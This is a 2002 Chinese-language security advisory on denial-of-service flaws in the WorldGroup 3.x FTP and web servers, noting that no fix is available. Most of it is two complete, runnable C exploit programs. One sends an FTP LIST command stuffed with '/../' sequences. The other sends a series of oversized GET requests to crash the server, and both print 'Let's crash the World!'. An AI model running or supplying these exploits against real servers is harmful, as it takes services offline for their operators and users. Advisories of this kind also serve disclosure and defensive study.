WorldGroup 3.0 FTP和WEB存在拒绝服务攻击发布时间:2002-02-28 更新时间:2002-02-28 严重程度:中 威胁程度:远程拒绝服务 错误类型:边界检查错误 利用方式:服务器模式 受影响系统 WorldGroup 3.x详细描述 WorldGroup 3.x 的FTP和WEB服务程序存在拒绝服务攻击,FTP在接收到多于105个 "/"字符后会产生服务停止响应,而WEB服务在接收到超长的GET请求时会导致拒绝 服务攻击:GET /signup/a.[aaaaaaaa....aaaa] 。 测试代码 ----------------- BEGIN FTP_DOS.C --------------------- /* by Limpid Byte project http://lbyte.void.ru lbyte@host.sk [Worldgroup FTP Server Denial of Service] More than 105 "/" in LIST command. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <winsock.h> #define FOUND "220" int main(int argc, char *argv[]) { int sock; struct sockaddr_in blah; struct hostent *he; char cgiBuff[1024]; char *cgiPage[6]; WSADATA wsaData; char cr[] = "\n"; if (argc < 3) { printf("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nThis program crash Worldgroup servers 3.xx for windows 95/98/ME/NT/2K."); printf("\n\rGreets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!\n\r USAGE:\n\r"); printf("Ftp_dos.exe [HOST] [LOGIN] [PASSWORD] "); printf("\n\r example : fpt_dos.exe 127.0.0.1 anonymous anonymous@127.0.0.1 \n"); exit(1); } cgiPage[0] = "USER "; cgiPage[1] = (argv[2]); cgiPage[2] = "PASS "; cgiPage[3] = (argv[3]); cgiPage[4] = "PASV"; cgiPage[5] = "LIST */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../\n"; if(WSAStartup(0x101,&wsaData)) { printf("Unable to initialize WinSock lib.\n"); exit(1); } printf("Let's crash the World!\n\r"); printf("Coded by the [eaSt]:\n\r"); printf("\nConnecting %s on port 21...\n\n", argv[1]); sock = socket(AF_INET,SOCK_STREAM,0); blah.sin_family=AF_INET; blah.sin_addr.s_addr=inet_addr(argv[1]); blah.sin_port=htons(21); if ((he = gethostbyname(argv[1])) != NULL) { memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length); } else { if ((blah.sin_addr.s_addr = inet_addr(argv[1]))==INADDR_NONE) { WSACleanup(); exit(1); } } if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))!=0) { WSACleanup(); exit(1); } memset(cgiBuff, 0, sizeof(cgiBuff)); cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0; printf("<< %s", cgiBuff); send(sock,cgiPage[0],strlen(cgiPage[0]),0); send(sock,cgiPage[1],strlen(cgiPage[1]),0); send(sock,cr,1,0); memset(cgiBuff, 0, sizeof(cgiBuff)); cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0; printf(">> %s %s\n<< %s", cgiPage[0], cgiPage[1], cgiBuff); send(sock,cgiPage[2],strlen(cgiPage[2]),0); send(sock,cgiPage[3],strlen(cgiPage[3]),0); send(sock,cr,1,0); memset(cgiBuff, 0, sizeof(cgiBuff)); cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0; printf(">> %s %s\n<< %s", cgiPage[2], cgiPage[3], cgiBuff); send(sock,cgiPage[4],strlen(cgiPage[4]),0); send(sock,cr,1,0); memset(cgiBuff, 0, sizeof(cgiBuff)); cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0; printf(">> %s\n<< %s", cgiPage[4], cgiBuff); send(sock,cgiPage[5],strlen(cgiPage[5]),0); send(sock,cr,1,0); memset(cgiBuff, 0, sizeof(cgiBuff)); cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0; printf(">> %s\n<< %s", cgiPage[5], cgiBuff); printf("Try reconnect to %s\n", argv[1]); WSACleanup(); return 0; } ----------------- END FTP_DOS.C --------------------- ----------------- BEGIN WWW_DOS.C --------------------- /* by Limpid Byte project http://lbyte.void.ru lbyte@host.sk Worldgroup Server Denial of Service for Windows 9x/ME only. Error between system fuction windows and worldgroup from web interface. REGUEST: GET /signup/a.[aaaaaaaa....aaaa] */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <winsock.h> #define FOUND "200" int main(int argc, char *argv[]) { int sock, count; struct sockaddr_in blah; struct hostent *he; char cgiBuff[1024]; WSADATA wsaData; if (argc < 2) { printf("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nThis program crash Worldgroup servers 3.20 for windows 95/98/ME.\n"); printf("Greets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!\n\n"); printf(" USAGE : www_dos.exe [HOST] \n"); printf(" example : www_dos.exe 127.0.0.1 \n"); exit(1); } if(WSAStartup(0x101,&wsaData)) { printf("Unable to initialize WinSock lib.\n"); exit(1); } printf("Let's crash the World!\n"); printf("Coded by the [eaSt]:\n"); printf("\nScanning %s on port 80...\n\n", argv[1]); for (count = 0; count < 94; count++) { sock = socket(AF_INET,SOCK_STREAM,0); blah.sin_family=AF_INET; blah.sin_addr.s_addr=inet_addr(argv[1]); blah.sin_port=htons(80); if ((he = gethostbyname(argv[1])) != NULL) { memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length); } else { if ((blah.sin_addr.s_addr = inet_addr(argv[1]))==INADDR_NONE) { WSACleanup(); exit(1); } } if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))!=0) { WSACleanup(); exit(1); } memset(cgiBuff, 0, sizeof(cgiBuff)); sprintf(cgiBuff, "GET /signup/"); memset(cgiBuff + 12, 'a', 219 + count); sprintf(cgiBuff + 12 + 219 + count, ".txt?=../test.txt HTTP/1.0\n\n"); printf("Sending: %d symbols request\n", strlen(cgiBuff)); send(sock,cgiBuff,strlen(cgiBuff),0); memset(cgiBuff, 0, sizeof(cgiBuff)); if(!recv(sock,cgiBuff,sizeof(cgiBuff),0)) { printf("Crashed\n"); } else { cgiBuff[32] = 0; if (strstr(cgiBuff,FOUND)) { printf("Send (%s)\n", cgiBuff); } else { printf("Not Found (%s)\n", cgiBuff); } } closesocket(sock); } printf("Try reconnect to %s\n", argv[1]); WSACleanup(); return 0; } ----------------- END WWW_DOS.C --------------------- 解决方案 尚无 相关信息 3APA3A (3APA3A@SECURITY.NNOV.RU) 参考:http://lbyte.void.ru/ 相关主页:http://www.gcomm.com/ |
